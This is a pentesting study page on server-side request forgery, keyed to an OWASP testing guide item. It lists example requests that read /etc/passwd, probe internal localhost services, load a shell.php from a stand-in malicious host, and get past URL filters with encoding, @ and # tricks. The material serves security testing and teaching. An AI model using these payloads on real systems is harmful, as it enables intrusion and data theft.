SSRF attack - Server Side Request Forgery

OWASP

OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.19. Testing for Server-Side Request Forgery

ID	Link to Hackinglife	Link to OWASP	Description
7.19	WSTG-INPV-19	Testing for Server-Side Request Forgery	- Identify SSRF injection points. - Test if the injection points are exploitable. - Asses the severity of the vulnerability.

Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make requests to an unintended location. The attacker could create a request to internet or to the intranet, which can be used to port scan or probe a remote machine. Basically, it could allow an atacker to:

• Take control of a remote machine.
• Read or update data.
• Read the server configuration.
• Connect to internal services...

With:

http://
file:///
dict://

Exploitation

Load the Contents of a File

GET https://example.com/page?page=https://malicioussite.com/shell.php

See Burpsuite Labs

Read files from restricted resources

GET https://example.com/page?page=https://localhost:8080/admin
GET https://example.com/page?page=https://127.0.0.1:8080/admin
GET https://example.com/page?page=file:///etc/passwd

Read files from other backend systems

In some cases, the application server is able to interact with back-end systems that are not directly reachable by users. These systems often have non-routable private IP addresses.

GET https://example.com/page?page=https://localhost:3306/
GET https://example.com/page?page=https://localhost:6379/
GET https://example.com/page?page=https://localhost:8080/

Gopherus sends non authenticated requests to other services and it succedde

Techniques

Bypass blacklist-based input filters

Some applications block input containing hostnames like 127.0.0.1 and localhost, or sensitive URLs like /admin. In this situation, you can often circumvent the filter using the following techniques:

• Use an alternative IP representation of 127.0.0.1, such as 2130706433, 017700000001, or 127.1.
• Register your own domain name that resolves to 127.0.0.1. You can use spoofed.burpcollaborator.net for this purpose.
• Obfuscate blocked strings using URL encoding or case variation.
• Provide a URL that you control, which redirects to the target URL. Try using different redirect codes, as well as different protocols for the target URL. For example, switching from an http: to https: URL during the redirect has been shown to bypass some anti-SSRF filters.

Bypass whitelist-based input filters

Some applications only allow inputs that match, a whitelist of permitted values. The filter may look for a match at the beginning of the input, or contained within in it. You may be able to bypass this filter by exploiting inconsistencies in URL parsing.

• Using the @ character to separate between the userinfo and the host: `https://expected-host:fakepassword@evil-host
• URL fragmentation with the # character: https://attacker-domain#expected-domain
• You can leverage the DNS naming hierarchy to place required input into a fully-qualified DNS name that you control. For example: - https://expected-host.evil-host
• URL encoding. Double URL-encode characters to confuse the URL-parsing code.
• Fuzzing
• Combinations of all of the above

Exploiting redirection vulnerabilities

It is sometimes possible to bypass filter-based defenses by exploiting an open redirection vulnerability.

Resources

• Portswigger: https://portswigger.net/web-security/ssrf.
• Portswigger labs.

Tools and payloads

• See updated chart: Attacks and tools for web pentesting.
• Gopherus.

Last update: 2024-05-01
Created: January 18, 2023 20:02:39